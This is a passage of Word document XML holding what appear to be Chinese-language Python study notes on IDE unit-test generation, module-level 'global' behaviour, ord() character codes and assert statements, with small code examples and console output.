      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后右键某方法，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>generate -&gt; Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767149A1" w14:textId="7858F571" w:rsidR="00AB747D" w:rsidRDefault="001B176D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07CCF9B3" wp14:editId="4CBB257B">
            <wp:extent cx="5274310" cy="3154045"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1760970760"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70760" name="图片 1" descr="图形用户界面, 文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId130"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3154045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="105B6A29" w14:textId="150F31EB" w:rsidR="00AB747D" w:rsidRDefault="002E4FD0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意改下这里的目标目录，默认</w:t>
      </w:r>
      <w:r w:rsidR="008C4C3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是解释器目录中的</w:t>
      </w:r>
      <w:r w:rsidR="008C4C3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C4C3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录测试路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="008C4C3C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们目前默认项目需求是我们的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2628D5EA" w14:textId="583AA6E6" w:rsidR="00AB747D" w:rsidRPr="008C269D" w:rsidRDefault="002E4FD0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D21B01A" wp14:editId="5435ED5E">
            <wp:extent cx="5274310" cy="2835275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="753744068" name="图片 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44068" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId131"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2835275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4040EFBA" w14:textId="27ED765E" w:rsidR="002B135A" w:rsidRDefault="00621D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后注意引用包、这两句判断语句，来看单元测试对不对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F66EF0C" w14:textId="0BDF106A" w:rsidR="002E4FD0" w:rsidRDefault="00621D64" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07855774" wp14:editId="7F0CCF1B">
            <wp:extent cx="5274310" cy="2695575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1135412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12347" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId132"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2695575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6996430E" w14:textId="77777777" w:rsidR="002E4FD0" w:rsidRDefault="002E4FD0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E00531C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="410" w:name="_Toc159779861"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写法特性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="410"/>
    </w:p>
    <w:p w14:paraId="4D8134BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D0E8C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="411" w:name="_Toc159779862"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨模块的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>global</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不会影响本模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="411"/>
    </w:p>
    <w:p w14:paraId="197F54B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> a.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> b.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E1C753" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A882A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA865A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A4FB718" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>def B():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2FD2E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print("B()'s b",b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BA06A8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139E6414" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>def A():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E720F49" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    global b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C129F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    b = "BBB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65734596" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("A()'s b",b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1241846E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    B()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768229E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8D863C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2263A269" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="635A5E4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>from a import A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE086BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C9DE789" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>b = "1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C85BAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>A()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2171945A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>print("B.py's b:", b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D550363" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616F9EE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行发现，不会影响到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122FF360" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="549877CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>C:\Users\ranja\Downloads&gt;python3 b.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7838C9B6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>A()'s b BBB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359F4DF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>B()'s b BBB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7DF616" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>B.py's b: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A56742B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B38F15" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="412" w:name="_Toc159779863"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ascii</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>码互相转换：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ord(),ascii(),chr()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="412"/>
    </w:p>
    <w:p w14:paraId="3084DCF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741DBC61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>def upAndDownRate(secret: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D0CE79" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    charList = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8DCDE6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    for singleChar in secret:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1720D782" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        charList.append(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>ord(singleChar)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F85FE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(charList)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108329C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E6BED7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，其实</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者单个的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行转码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39340823" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果遇到中文字符这种宽字节，按照上述代码进行转码，可以转出来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>21704</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这么大的数字。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C28EBE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4AD58D07" wp14:editId="7D901197">
            <wp:extent cx="6698615" cy="1690370"/>
            <wp:effectExtent l="0" t="0" r="6985" b="127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133"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6698615" cy="1690370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EDBCF3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0376A88C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2CB668" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205EB2C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="413" w:name="_Toc159779864"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>断言</w:t>
      </w:r>
      <w:bookmarkEnd w:id="413"/>
    </w:p>
    <w:p w14:paraId="6BFD9E5C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会直接抛出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> AssertionError </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的异常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB12B5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; assert False, "aaa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D90651" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Traceback (most recent call last):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED43D8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "&lt;stdin&gt;", line 1, in &lt;module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4A01D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AssertionError: aaa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2534A697" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; assert True, "aaa"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE7A567" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C14340" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
